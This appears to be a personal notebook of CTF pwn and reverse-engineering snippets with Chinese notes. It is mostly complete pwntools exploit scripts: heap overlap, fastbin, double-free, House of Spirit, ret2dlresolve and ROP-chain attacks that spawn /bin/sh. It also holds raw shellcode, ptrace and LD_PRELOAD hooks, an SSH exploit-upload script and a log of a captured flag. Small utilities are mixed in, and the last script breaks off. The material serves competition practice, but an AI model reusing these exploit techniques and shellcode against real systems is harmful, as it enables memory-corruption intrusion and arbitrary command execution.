for(var i=0;i<exports.length;i++){
if(exports[i].name == "system"){
send("name: "+exports[i].name+" address: "+exports[i].address);
}
}
'''
p_pwn = process("./re")
p = frida.attach("re")
script = p.create_script(jscode)
script.on('message',PrintMessage)
script.load()
system_addr = int(system_addr,16)
proc_addr = int(proc_addr,16)
print("system_addr: " + hex(system_addr))
print("proc_addr: " + hex(proc_addr))
pay = b"a"*24 + p64(proc_addr + 0x753) + p64(proc_addr +0x774) + p64(system_addr)
#sys.stdin.read()
p_pwn.sendline(pay)
p_pwn.interactive()
'''
var pro_addr = Module.findBaseAddress('re');
send("pro_addr: " + pro_addr);
console.log(hexdump(pro_addr, {
offset: 743,
length: 750,
header: true,
ansi: true
}));
'''
LKM Makefile
KVERS = $(shell uname -r)
# Kernel modules name
obj-m += file_name.o
# Many file.c
#modulename-objs := file1.o file2.o
# Specify flags for the module compilation.
#EXTRA_CFLAGS=-g -O0
build: kernel_modules
kernel_modules:
make -C /lib/modules/$(KVERS)/build M=$(CURDIR) modules
clean:
make -C /lib/modules/$(KVERS)/build M=$(CURDIR) clean
Linux Hook
//main.c
#include <stdio.h>
#include <string.h>
int main(int argc, char *argv[])
{
if( strcmp(argv[1], "test") )
{
printf("Incorrect password\n");
}
else
{
printf("Correct password\n");
}
return 0;
}
//hook.c
#include <stdio.h>
#include <string.h>
#include <dlfcn.h>
/*
hook的目标是strcmp,所以typedef了一个STRCMP函数指针
hook的目的是要控制函数行为,从原库libc.so.6中拿到strcmp指针,保存成old_strcmp以备调用
*/
typedef int(*STRCMP)(const char*, const char*);
int strcmp(const char *s1, const char *s2)
{
static void *handle = NULL;
static STRCMP old_strcmp = NULL;
if( !handle )
{
handle = dlopen("libc.so.6", RTLD_LAZY);
old_strcmp = (STRCMP)dlsym(handle, "strcmp");
}
printf("oops!!! hack function invoked. s1=<%s> s2=<%s>\n", s1, s2);
return 0;
}
gcc -o test main.c
gcc -fPIC -shared -o hook.so hook.c -ldl
LD_PRELOAD=./hook.so ./test 123
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <sys/reg.h> /* For constants ORIG_EAX etc */
#include <sys/user.h>
void new_show()
{
printf("Hooked by cc-sir!\n");
}
int main(int argc, char *argv[])
{
if(argc!=2) {
printf("Usage: %s pid\n", argv[0]);
return 1;
}
struct user_regs_struct reg;
pid_t pid = atoi(argv[1]);
ptrace(PTRACE_ATTACH, pid,NULL,NULL);
wait(NULL);
ptrace(PTRACE_GETREGS,pid,NULL,®);
printf("rip: 0x%lx\n",reg.rip);
long addr = reg.rip;
long show_addr = 0x400586;
long code = 0xcc80cd;
long back_code;
int id;
back_code = ptrace(PTRACE_PEEKTEXT, pid, addr, NULL); //保留源码
printf("back_code: %llx\n",back_code);
if(ptrace(PTRACE_POKETEXT, pid, addr, code) < 0){ //修改源码
perror("PTRACE_POKETEXT");
return 0;
}
ptrace(PTRACE_CONT, pid, NULL, NULL);
wait(NULL);
printf("The process has int 0x3!\n");
getchar();
if(ptrace(PTRACE_POKETEXT, pid, addr, back_code) < 0){ //还原代码
perror("PTRACE_POKETEXT");
return 0;
}
ptrace(PTRACE_SETREGS, pid, NULL, ®); //还原寄存器
ptrace(PTRACE_CONT, pid, NULL, NULL);
printf("The process has continue run!\n");
ptrace(PTRACE_DETACH, pid, NULL, NULL);
return 0;
}
linux对apk签名
keytool -genkey -v -alias KeyName -keyalg RSA -keysize 2048 -validity 10000 -keystore KeyFileName.keystore
jarsigner -verbose -keystore KeyFileName.keystore apk_file.apk KeyName
Linux 编译libc.so
libc: sir.c:
int add(int a, int b){
return a+b;
}
编译:
gcc -fPIC -shared -o libsir.so sir.c
调用:
sir.h
#ifndef __SIR_H__
#define __SIR_H__
int add(int n1, int n2);
#endif
test.c:
#include<stdio.h>
#include"sir.h"
int main(){
int sum;
sum = add(6,4);
printf("%d\n",sum);
return 0;
}
编译
gcc test.c -o test -L ./ -lsir
运行:
LD_LIBRARY_PATH=./ ./test
字符串画图片
from PIL import Image, ImageDraw, ImageFont
font_size = 12
text = "xxxx!"
img_path = "/home/cc-sir/desktop/xx.jpg"
img_raw = Image.open(img_path)
img_array = img_raw.load()
img_new = Image.new("RGB", img_raw.size, (0, 0, 0))
draw = ImageDraw.Draw(img_new)
font = ImageFont.truetype('/home/cc-sir/desktop/msyh.ttc', font_size)
def character_generator(text):
while True:
for i in range(len(text)):
yield text[i]
ch_gen = character_generator(text)
for y in range(0, img_raw.size[1], font_size):
for x in range(0, img_raw.size[0], font_size):
draw.text((x, y), next(ch_gen), font=font, fill=img_array[x, y], direction=None)
img_new.convert('RGB').save("/home/cc-sir/desktop/hh.jpeg")
攻防世界
Noleak
部分地址覆盖爆破:
# -*- coding: utf-8 -*-
from pwn import *
#context(os='linux',arch='amd64')
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh', '-c']
name = "./timu"
p = process(name)
#p = remote("111.198.29.45",31616)
elf = ELF(name)
#libc=ELF('/usr/lib/i386-linux-gnu/libc-2.24.so')
#libc=ELF('./libc.so.6')
if args.G:
gdb.attach(p)
def add(s,data):
p.recvuntil("Your choice :")
p.sendline("1")
p.recvuntil("Size: ")
p.sendline(s)
p.recvuntil("Data: ")
p.send(data)
def delete(i):
p.recvuntil("Your choice :")
p.sendline("2")
p.recvuntil("Index: ")
p.sendline(i)
def update(i,s,data):
p.recvuntil("Your choice :")
p.sendline("3")
p.recvuntil("Index: ")
p.sendline(i)
p.recvuntil("Size: ")
p.sendline(s)
p.recvuntil("Data: ")
p.send(data)
shellcode = "\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05"
add("180",b"1"*16*6 + p64(0) + p64(0x41)) #0
add("100","2"*8) #1
add("100","3"*8) #2
add("100","4"*8) #3
add("100","5"*8) #4
#delete("0")
delete("2")
delete("3")
update("3","100",p64(0x600ff5))
add("100","6"*8) #5
add("100","7"*59 + "\x00") #6
update("0","100",p64(0) + b"\x71")
update("6","100","7"*59 + "\x10")
delete("0")
update("6","100","7"*59 + "\x00")
update("0","100",p64(0) + b"\xc1")
update("6","100","7"*59 + "\x10")
delete("0")
# malloc_hook = 0x9aed
update("6","100","7"*59 + "\x00")
update("0","100",p64(0) + b"\x71")
update("6","100",shellcode + "7"*(59-len(shellcode)) + "\x10")
update("0","100",p16(0x6aed))
add("100","sir")
add("100",b"8"*19 + p64(0x600ff5+0x10))
p.recvuntil("Your choice :")
p.sendline("1")
p.recvuntil("Size: ")
p.sendline("1")
p.interactive()
supermarket
漏洞在于realloc, 当重新分配的new_size < pre_size, 返回原指针; new_size > pre_size释放原指针, 重新分配内存.
可以用堆覆盖,大堆编辑其中的小堆:
# -*- coding: utf-8 -*-
from pwn import *
context(os='linux',arch='amd64')
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh', '-c']
name = "./supermarket"
p = process(name)
#p = remote("111.198.29.45",38460)
elf = ELF(name)
#libc=ELF('/usr/lib/i386-linux-gnu/libc-2.24.so')
libc=ELF('./libc.so.6')
if args.G:
gdb.attach(p)
# 漏洞在realloc, 当重新分配的new_size < pre_size, 返回原指针; new_size > pre_size释放原原指针, 重新分配内存.
def add(name,size,description):
p.recvuntil("your choice>> ")
p.sendline("1")
p.recvuntil("name:")
p.sendline(name)
p.recvuntil("price:")
p.sendline("100")
p.recvuntil("descrip_size:")
p.sendline(str(size))
p.recvuntil("description:")
p.sendline(description)
def change(name,size,description):
p.recvuntil("your choice>> ")
p.sendline("5")
p.recvuntil("name:")
p.sendline(name)
p.recvuntil("descrip_size:")
p.sendline(str(size))
p.recvuntil("description:")
p.sendline(description)
def show():
p.recvuntil("your choice>> ")
p.sendline("3")
# 0x08048864
add('aaaa',0x20,"1111")
add('bbbb',0x80,"2222")
add('cccc',0x20,"3333")
change("bbbb",0xb0,"q")
add("dddd",0x50,'4444')
pay = b"dddd\x00" + b'q'*11 + p32(0x64) + p32(0x50) + p32(0x804b048)
change("bbbb",0x80,pay)
show()
p.recvuntil("dddd: price.100, des.")
atoi_addr = u32(p.recv(4))
libc_addr = atoi_addr - libc.symbols['atoi']
system_addr = libc_addr + libc.symbols['system']
success("atoi_addr: " + hex(atoi_addr))
pay1 = p32(system_addr)
change("dddd",0x50,pay1)
p.recvuntil("your choice>> ")
p.sendline("/bin/sh")
p.interactive()
note-service2
# -*- coding: utf-8 -*-
from pwn import *
context(os='linux',arch='amd64')
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh', '-c']
name = "./pwn"
p = process(name)
#p = remote("111.198.29.45",54704)
elf = ELF(name)
# libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
# libc=ELF('./pwn')
if args.G:
gdb.attach(p)
def add(i,data):
p.recvuntil("your choice>> ")
p.sendline("1")
p.recvuntil("index:")
p.sendline(str(i))
p.recvuntil("size:")
p.sendline('8')
p.recvuntil("content:")
p.send(data)
def delete(i):
p.recvuntil("your choice>> ")
p.sendline("4")
p.recvuntil("index:")
p.sendline(str(i))
add(0,asm('xor rax,rax') + b'\x90\x90\xeb\x19')
add(1,asm('xor rax,rax') + b'\x90\x90\xeb\x19')
add(2,asm('mov eax,0x3b') + b'\xeb\x19')
add(3,asm('xor rsi,rsi') + b'\x90\x90\xeb\x19')
add(4,asm('xor rdx,rdx') + b'\x90\x90\xeb\x19')
add(5,asm('syscall') + b'\x90'*5)
delete(0)
add(-8,asm('xor rax,rax') + b'\x90\x90\xeb\x19')
p.recvuntil("your choice>> ")
p.sendline("/bin/sh")
p.interactive()
Python base64替换密码表
import base64
import string
x = "5rFf7E2K6rqN7Hpiyush7E6S5fJg6rsi5NBf6NGT5rs="
base_now = ['v', 'w', 'x', 'r', 's', 't', 'u', 'o', 'p', 'q', '3', '4', '5', '6', '7', 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'y', 'z', '0', '1', '2', 'P', 'Q', 'R', 'S', 'T', 'K', 'L', 'M', 'N', 'O', 'Z', 'a', 'b', 'c', 'd', 'U', 'V', 'W', 'X', 'Y', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', '8', '9', '+', '/']
base_now_str = ''.join(base_now)
print len(base_now_str)
base_original_str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
print len(base_original_str)
flag = base64.b64decode(x.translate(string.maketrans(base_now_str, base_original_str)))
print flag
babystack
# -*- coding: utf-8 -*-
from pwn import *
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh', '-c']
name = "./pwn"
p = process(name)
elf = ELF(name)
# libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
libc=ELF('./babystack/libc-2.27.so')
if args.G:
gdb.attach(p)
p.recvuntil("What's your name: ")
pay = "a" * 133 + 'b'*4
p.send(pay)
p.recvuntil("bbbb")
cannary = u64('\x00' + p.recv(7))
core_starr = u64(p.recv(6) + '\x00\x00') - 0x910
success("canary: " + hex(cannary))
success("core_starr: " + hex(core_starr))
pop_rdi = core_starr + 0x973 #pop rdi; ret;
pay = 'a'*136 + p64(cannary) + p64(core_starr + 0x80a)
p.recvuntil("What do you want to say: ")
p.sendline(pay)
p.recvuntil("What's your name: ")
pay = "a" * (136+8) + 'b'*8
p.send(pay)
p.recvuntil("b" * 8)
lib_starr = u64(p.recv(6) + '\x00\x00') - 0x441270 #libc.symbols['__libc_start_main'] #0x441270
success("lib_starr: " + hex(lib_starr))
p.recvuntil("What do you want to say: ")
bin_sh = lib_starr + 0x5829d9 #libc.search['/bin/sh']#
system_addr = lib_starr + 0x460480 #libc.symbols['system']#0x460480
pay = 'c'*136 + p64(cannary) + "qqqqqqqq" + p64(pop_rdi) + p64(bin_sh) + p64(system_addr)
p.send(pay)
p.interactive()
'''
libc2.23:
system_offset = 0x45390 # 0x3f480
bin_sh_offset = 0x18cd57 # 0x1619d9
free_offset = 0x3e3e90
malloc_offset = 0x3e3e40
malloc_hook_offset = 0x3c4b10
free_hook_offset = 0x3c67a8
0x45216 execve("/bin/sh", rsp+0x30, environ)
constraints:
rax == NULL
0x4526a execve("/bin/sh", rsp+0x30, environ)
constraints:
[rsp+0x30] == NULL
0xf02a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
[rsp+0x50] == NULL
0xf1147 execve("/bin/sh", rsp+0x70, environ)
constraints:
[rsp+0x70] == NULL
'''
CTF-wiki
2017 0ctf bheap
# -*- coding: utf-8 -*-
from pwn import *
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './bheap'
elf = ELF(name)
p = process(name)
#p = remote("111.198.29.45",30617)
if args.G:
gdb.attach(p)
def alloc(s):
p.recvuntil("Command: ")
p.sendline("1")
p.recvuntil("Size: ")
p.sendline(str(s))
def fill(i,s,data):
p.recvuntil("Command: ")
p.sendline("2")
p.recvuntil("Index: ")
p.sendline(str(i))
p.recvuntil("Size: ")
p.sendline(str(s))
p.recvuntil("Content: ")
p.sendline(data)
def free(i):
p.recvuntil("Command: ")
p.sendline("3")
p.recvuntil("Index: ")
p.sendline(str(i))
def dump(i):
p.recvuntil("Command: ")
p.sendline("4")
p.recvuntil("Index: ")
p.sendline(str(i))
alloc(10) # 0
alloc(10) # 1
alloc(10) # 2
alloc(10) # 3
alloc(10) # 4
alloc(0x80) # 5
free(1)
free(3)
payload = 'a'*24 + p64(0x21) + p8(0xa0)
fill(2,len(payload),payload)
payload = 'a'*24 + p64(0x21)
fill(4,len(payload),payload)
alloc(10) # 1
alloc(10) # 3 5
payload = 'a'*24 + p64(0x91)
fill(4,len(payload),payload)
alloc(0x80) # 6
free(5)
dump(3)
p.recvuntil("Content: \n")
main_arena = u64(p.recv(6) + '\x00\x00') - 0x58
success("main_arena: " + hex(main_arena))
alloc(0x60) # 5
free(5)
payload = p64(main_arena-0x33)
fill(3,len(payload),payload)
alloc(0x60) # 5
alloc(0x60) # 6
one_gadget = main_arena - 0x399b00 + 0x3f35a
payload = '|/bin/sh;' + 'a'*10 + p64(one_gadget)
fill(7,len(payload),payload)
alloc(0x20)
p.interactive()
2015 9447 CTF : Search Engine
Double_Free:
# -*- coding: utf-8 -*-
from pwn import *
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './search'
p = process(name)
if args.G:
gdb.attach(p)
def search(s):
p.recvuntil("3: Quit\n")
p.sendline("1")
p.recvuntil("Enter the word size:\n")
p.sendline(str(len(s)))
p.recvuntil("Enter the word:\n")
p.sendline(s)
def delete(s):
p.recvuntil("Delete this sentence (y/n)?\n")
p.sendline(s)
def index(s):
p.recvuntil("3: Quit\n")
p.sendline("2")
p.recvuntil("Enter the sentence size:\n")
p.sendline(str(len(s)))
p.recvuntil("Enter the sentence:\n")
p.sendline(s)
def offset_bin_main_arena(idx):
word_bytes = context.word_size / 8
offset = 4 # lock
offset += 4 # flags
offset += word_bytes * 10 # offset fastbin
offset += word_bytes * 2 # top,last_remainder
offset += idx * 2 * word_bytes # idx
offset -= word_bytes * 2 # bin overlap
return offset
unsortedbin_offset_main_arena = offset_bin_main_arena(0)
index("a"*0x85 + " s")
search("s")
delete('y')
search("\x00")
p.recvuntil("Found 135: ")
lib_addr = u64(p.recv(6) + '\x00\x00')
one_gadget_addr = lib_addr - 0x399b58 + 0x3f306
main_arena_addr = lib_addr - 0x58
delete('n')
index('a'*0x5d + ' d')
index('b'*0x5d + ' d')
index('c'*0x5d + ' d')
search("d")
delete("y")
delete("y")
delete("y")
search("\x00")
delete("y")
delete("n")
delete("n")
fake_chunk_addr = main_arena_addr - 0x33
fake_chunk = p64(fake_chunk_addr).ljust(0x60, 'f')
index(fake_chunk)
index('a' * 0x60) #分配chunk_a
index('b' * 0x60) #分配chunk_b
payload = '|/bin/sh;'
payload += (0x13-len(payload))*'a' + p64(one_gadget_addr)
payload = payload.ljust(0x60, 'f')
index(payload) #malloc_hook为one_gadget
success("lib_addr: " + hex(lib_addr))
p.interactive()
2014 hack.lu oreo
House Of Spirit:
from pwn import *
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './oreo'
p = process(name)
if args.G:
gdb.attach(p)
def add(name,descrip):
#p.recvuntil("Action: ")
p.sendline('1')
#p.recvuntil('Rifle name: ')
p.sendline(name)
#p.recvuntil('Rifle description: ')
#sleep(0.5)
p.sendline(descrip)
def show():
#p.recvuntil("Action: ")
p.sendline('2')
p.recvuntil('===================================\n')
def order():
#p.recvuntil("Action: ")
p.sendline('3')
def message(notice):
#p.recvuntil("Action: ")
p.sendline('4')
#p.recvuntil("Enter any notice you'd like to submit with your order: ")
p.sendline(notice)
name = 'a'*27 + p32(0x804a248)
descrip = 'a'*25
add(name,descrip)
show()
p.recvuntil("===================================\nName: \nDescription: ")
put_addr = u32(p.recv(4))
system_addr = put_addr - 0x24d40
success("put_addr: " + hex(put_addr))
success("system_addr: " + hex(system_addr))
for i in range(1,0x3f):
name = 'a'*27 + p32(0)
descrip = 'a'*25
add(name,descrip)
name = 'a'*27 + p32(0x804a2a8)
descrip = 'a'*25
add(name,descrip)
payload = 0x20 * '\x00' + p32(0x40) + p32(0x90)
message(payload)
order()
add('a'*4,p32(0x804a250))
notice = p32(system_addr) + '||/bin/sh\x00'
message(notice)
p.interactive()
常用URL
字典:
https://github.com/rootphantomer/Blasting_dictionary
upload
#!/usr/bin/python
from pwn import *
HOST = "12.12.12.12"
PORT = 1234
USER = "pwn"
PW = "sir"
def compile():
log.info("Compile")
os.system("gcc -w -static poc.c -o poc")
def exec_cmd(cmd):
r.sendline(cmd)
r.recvuntil("$ ")
def upload():
p = log.progress("Upload")
with open("poc", "rb") as f:
data = f.read()
encoded = base64.b64encode(data)
r.recvuntil("$ ")
for i in range(0, len(encoded), 300):
p.status("%d / %d" % (i, len(encoded)))
exec_cmd("echo \"%s\" >> benc" % (encoded[i:i+300]))
exec_cmd("cat benc | base64 -d > exp")
exec_cmd("chmod +x exp")
p.success()
def exploit(r):
compile()
upload()
r.interactive()
return
if __name__ == "__main__":
if len(sys.argv) > 1:
session = ssh(USER, HOST, PORT, PW)
r = session.run("/bin/sh")
exploit(r)
else:
r = process("./start.sh")
print util.proc.pidof(r)
pause()
exploit(r)
vmliux
#!/bin/sh
check_vmlinux()
{
# Use readelf to check if it's a valid ELF
# TODO: find a better to way to check that it's really vmlinux
# and not just an elf
readelf -h $1 > /dev/null 2>&1 || return 1
cat $1
exit 0
}
try_decompress()
{
# The obscure use of the "tr" filter is to work around older versions of
# "grep" that report the byte offset of the line instead of the pattern.
# Try to find the header ($1) and decompress from here
for pos in `tr "$1\n$2" "\n$2=" < "$img" | grep -abo "^$2"`
do
pos=${pos%%:*}
tail -c+$pos "$img" | $3 > $tmp 2> /dev/null
check_vmlinux $tmp
done
}
# Check invocation:
me=${0##*/}
img=$1
if [ $# -ne 1 -o ! -s "$img" ]
then
echo "Usage: $me <kernel-image>" >&2
exit 2
fi
# Prepare temp files:
tmp=$(mktemp /tmp/vmlinux-XXX)
trap "rm -f $tmp" 0
# That didn't work, so retry after decompression.
try_decompress '\037\213\010' xy gunzip
try_decompress '\3757zXZ\000' abcde unxz
try_decompress 'BZh' xy bunzip2
try_decompress '\135\0\0\0' xxx unlzma
try_decompress '\211\114\132' xy 'lzop -d'
try_decompress '\002!L\030' xxx 'lz4 -d'
try_decompress '(\265/\375' xxx unzstd
# Finally check for uncompressed images or objects:
check_vmlinux $img
# Bail out:
echo "$me: Cannot find vmlinux." >&2
python&&C混合编程
使用python标准库中自带的ctypes模块进行python和c的混合编程,需要先查找动态链接库:
sir@sir-PC:~/desktop$ ldd pwn1
linux-vdso.so.1 (0x00007ffcaa9e0000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f6a323f6000)
/lib64/ld-linux-x86-64.so.2 (0x00007f6a327d9000)
from pwn import *
from ctypes import *
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = "./pwn1"
elf = ELF(name)
libc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
#p = process(name)
p = remote('111.198.29.45',30261)
if args.G:
gdb.attach(p)
p.recvuntil("Your name:")
p.sendline('a'*0x20 + p64(0x1))
libc.srand(1)
for i in range(10):
num = str(libc.rand()%6+1)
p.recvuntil('number:')
p.sendline(num)
p.interactive()
qmeu
打包:
find . | cpio -o --format=newc > ../rootfs.cpio
解压:
cpio -idmv < ../rootfs.cpio
启动:
#!/bin/bash
qemu-system-x86_64 \
-initrd rootfs.cpio \
-kernel bzImage \
-append 'console=ttyS0 root=/dev/ram oops=panic panic=1' \
-monitor /dev/null \
-m 256M \
--nographic \
-smp cores=1,threads=1 \
-cpu kvm64,+smep \
-gdb tcp::1234
关闭 kptr_restrict:
echo 0 > /proc/sys/kernel/kptr_restrict
IDA_IDC脚本
dump数值
auto i,fp;
fp = fopen("D:\\dump.txt","wb");
for(i=0x403230;i<0x403617;i++)
fputc(Byte(i),fp);
dump汇编代码
auto code,n,i,fp;
fp = fopen("C:\\Users\\sir\\Desktop\\dump.txt","wb");
for(i=0x401000;i<0x40106C;){
n = MakeCode(i);
fprintf(fp,"%x: %s\n",i,GetDisasm(i));
i = i + n;
}
Message("Ok!\n");
解密代码
for i in range(0x600b00, 0x600b00+181):
x = idc.Byte(i) ^ 0xc
PatchByte(i, x)
print("Ok...")
python处理文件
'''
import re
file1 = open('sir.log', 'r')
file2 = open('sir.txt', 'w')
for line in file1.readlines():
if re.match(r'^name_cn.*\n',line):
file2.write(line)
'''
# -*- coding:utf-8 -*-
#! python2
import shutil
a=0
readDir = "./sir.txt" #old
writeDir = "./new.txt" #new
lines_seen = set()
outfile = open(writeDir, "w")
f = open(readDir, "r")
for line in f:
if line not in lines_seen:
a+=1
outfile.write(line)
lines_seen.add(line)
print(a)
print('\n')
outfile.close()
print("success")
i春秋_break
from pwn import *
context.log_level = 'debug'
name = './pwn'
p = process(name)
#p = remote('106.75.2.53', 10008)
elf = ELF(name)
if args.G:
gdb.attach(p)
main_addr = 0x080486DD
p.recvuntil("Yo, what's your name:\n")
pay = 'a'*12 + p32(elf.plt['printf']) + p32(main_addr) + p32(elf.got['read']) + 'b'*4
p.sendline(pay)
p.recvuntil("bbbb\n")
payload = 'Methamphetamine' + p32(0xfffeffef)
p.sendline(payload)
p.recvuntil('packing drugs...\n')
printf_addr = u32(p.recv()[4:8])
system_addr = printf_addr - 0x13e80
bin_sh_addr = printf_addr + 0x12c24a
success("printf_addr " + hex(printf_addr))
success("system_addr " + hex(system_addr))
pay1 = 'a'*12 + p32(system_addr) + p32(main_addr) + p32(bin_sh_addr) + 'b'*4
p.sendline(pay1)
p.recvuntil("bbbb\n")
payload = 'Methamphetamine' + p32(0xfffeffef)
p.sendline(payload)
p.interactive()
看雪_流浪者
#include<stdio.h>
int main() {
char source[] = "abcdefghiABCDEFGHIJKLMNjklmn0123456789opqrstuvwxyzOPQRSTUVWXYZ" ;
char key[] = "KanXueCTF2019JustForhappy";
int y,i;
for ( i = 0; i<26 ; i++ ) {
int x = 48;
while(x<122) {
if ( x > 57 || x < 48 ) {
if ( x > 122 || x < 97 ) {
if ( x > 90 || x < 65 ) {
x++;
continue;
} else
y = x - 29;
} else {
y = x - 87;
}
} else {
y = x - 48;
}
if(y>0&&y<62&&source[y] == key[i]) {
printf("%c",x); //j0rXI4bTeustBiIGHeCF70DDM
x++;
continue;
}
x++;
}
}
return 0;
}
i春秋_loading
mmap函数可以使空间拥有可执行权限;
计算机浮点数的表示方法;
from pwn import *
import struct
p = remote('106.75.2.53',10009)
#p = process('./loading')
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
if args.G:
gdb.attach(p)
def get_int(s):
a = struct.unpack('<f', s)[0]*2333
return struct.unpack('I', struct.pack('<I', a))[0]
for i in range(3):
p.sendline(str(get_int('\x00\x00\x00\x00')))
p.sendline(str(get_int('\x99\x89\xc3\x47'))) # mov ebx, eax
p.sendline(str(get_int('\x41\x44\x44\x44'))) # nop/align
for c in '/bin/sh\x00':
p.sendline(str(get_int('\x99\xb0'+c+'\x47'))) # mov al, c
p.sendline(str(get_int('\x57\x89\x03\x43'))) # mov [ebx], eax; inc ebx
for i in range(8):
p.sendline(str(get_int('\x57\x4b\x41\x47'))) # dec ebx
p.sendline(str(get_int('\x99\x31\xc0\x47'))) # xor eax, eax
p.sendline(str(get_int('\x99\x31\xc9\x47'))) # xor ecx, ecx
p.sendline(str(get_int('\x99\x31\xd2\x47'))) # xor edx, edx
p.sendline(str(get_int('\x99\xb0\x0b\x47'))) # mov al, 0xb
p.sendline(str(get_int('\x99\xcd\x80\x47'))) # int 0x80
p.sendline('c')
p.interactive()
[*] Switching to interactive mode
[DEBUG] Received 0xb bytes:
'try to pwn\n'
try to pwn
$ cat flag
[DEBUG] Sent 0x9 bytes:
'cat flag\n'
[DEBUG] Received 0x2b bytes:
'flag{7a1735b9-fcaf-43fd-8d5a-dd49baf6e077}\n'
flag{7a1735b9-fcaf-43fd-8d5a-dd49baf6e077}
$
[*] Closed connection to 106.75.2.53 port 10009
XDCTF_pwn01
from pwn import *
context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './main'
p = process(name)
elf= ELF(name)
rel_plt_addr = elf.get_section_by_name('.rel.plt').header.sh_addr #0x8048330
dynsym_addr = elf.get_section_by_name('.dynsym').header.sh_addr #0x80481d8
dynstr_addr = elf.get_section_by_name('.dynstr').header.sh_addr #0x8048278
resolve_plt = 0x08048380
leave_ret_addr = 0x0804851D
start = 0x804aa00
fake_rel_plt_addr = start
fake_dynsym_addr = fake_rel_plt_addr + 0x8
fake_dynstr_addr = fake_dynsym_addr + 0x10
bin_sh_addr = fake_dynstr_addr + 0x7
n = fake_rel_plt_addr - rel_plt_addr
r_info = (((fake_dynsym_addr - dynsym_addr)/0x10) << 8) + 0x7
str_offset = fake_dynstr_addr - dynstr_addr
fake_rel_plt = p32(elf.got['read']) + p32(r_info)
fake_dynsym = p32(str_offset) + p32(0) + p32(0) + p32(0x12000000)
fake_dynstr = "system\x00/bin/sh\x00\x00"
pay1 = 'a'*108 + p32(start - 20) + p32(elf.plt['read']) + p32(leave_ret_addr) + p32(0) + p32(start - 20) + p32(0x100)
p.recvuntil('Welcome to XDCTF2015~!\n')
p.sendline(pay1)
pay2 = p32(0x0) + p32(resolve_plt) + p32(n) + 'aaaa' + p32(bin_sh_addr) + fake_rel_plt + fake_dynsym + fake_dynstr
p.sendline(pay2)
success(".rel_plt: " + hex(rel_plt_addr))
success(".dynsym: " + hex(dynsym_addr))
success(".dynstr: " + hex(dynstr_addr))
success("fake_rel_plt_addr: " + hex(fake_rel_plt_addr))
success("fake_dynsym_addr: " + hex(fake_dynsym_addr))
success("fake_dynstr_addr: " + hex(fake_dynstr_addr))
success("n: " + hex(n))
success("r_info: " + hex(r_info))
success("offset: " + hex(str_offset))
success("system_addr: " + hex(fake_dynstr_addr))
success("bss_addr: " + hex(elf.bss()))
p.interactive()
sha1加密
from hashlib import *
i = 0
while(1):
pwd = str(i)
s1 = sha1()
s1.update(pwd.encode('utf-8'))
result = s1.hexdigest()
if '40bd001563085f' in result:
print("flag: " + str(i))
break
i += 1
print(result)
2017湖湘杯_pwn300
程序在计算加减乘除功能的时候,将结果保存在申请的堆中,最后将堆中的结果复制到栈中,这就导致了可能会栈溢出;
然后 程序又是通过静态编译的,可以在程序中找到合适ROP链;
ROPgadget --binary pwn300 --ropchain
然后程序又只能输入十进制的数,可以通过ctypes.c_int32(j).value的方式输入;
from pwn import *
import binascii
import ctypes as ct
from struct import pack
#context.log_level = 'debug'
context.terminal = ['deepin-terminal', '-x', 'sh' ,'-c']
name = './helloworld'
io = process(name)
elf= ELF(name)
#libc = ELF('./libc_32.so.6')
if args.G:
gdb.attach(io)
def base_addr(pro_addr,offset):
return eval(pro_addr)-offset
p=[]
p.append( 0x0806ed0a) # pop edx ; ret
p.append( 0x080ea060) # @ .data
p.append( 0x080bb406) # pop eax ; ret
p.append(eval('0x'+binascii.b2a_hex('nib/')))
p.append( 0x080a1dad) # mov dword ptr [edx], eax ; ret
p.append( 0x0806ed0a) # pop edx ; ret
p.append( 0x080ea064) # @ .data + 4
p.append( 0x080bb406) # pop eax ; ret
p.append(eval('0x'+binascii.b2a_hex('hs//')))
p.append(0x080a1dad) # mov dword ptr [edx], eax ; ret
p.append(0x0806ed0a) # pop edx ; ret
p.append(0x080ea068) # @ .data + 8
p.append(0x08054730) # xor eax, eax ; ret
p.append(0x080a1dad) # mov dword ptr [edx], eax ; ret
p.append(0x080481c9) # pop ebx ; ret
p.append(0x080ea060) # @ .data
p.append(0x0806ed31) # pop ecx ; pop ebx ; ret
p.append(0x080ea068) # @ .data + 8
p.append(0x080ea060) # padding without overwrite ebx
p.append(0x0806ed0a) # pop edx ; ret
p.append(0x080ea068) # @ .data + 8
p.append(0x08054730) # xor eax, eax ; ret
p.append(0x0807b75f) # inc eax ; ret
p.append(0x0807b75f) # inc eax ; ret
p.append(0x0807b75f) # inc eax ; ret
p.append(0x0807b75f) # inc eax ; ret
p.append(0x0807b75f) # inc eax ; ret
p.append(0x0807b75f) # inc eax ; ret
p.append(0x0807b75f) # inc eax ; ret
p.append(0x0807b75f) # inc eax ; ret
p.append(0x0807b75f) # inc eax ; ret
p.append(0x0807b75f) # inc eax ; ret
p.append(0x0807b75f) # inc eax ; ret
p.append(0x08049781) # int 0x80
tempnum=0
#debug()
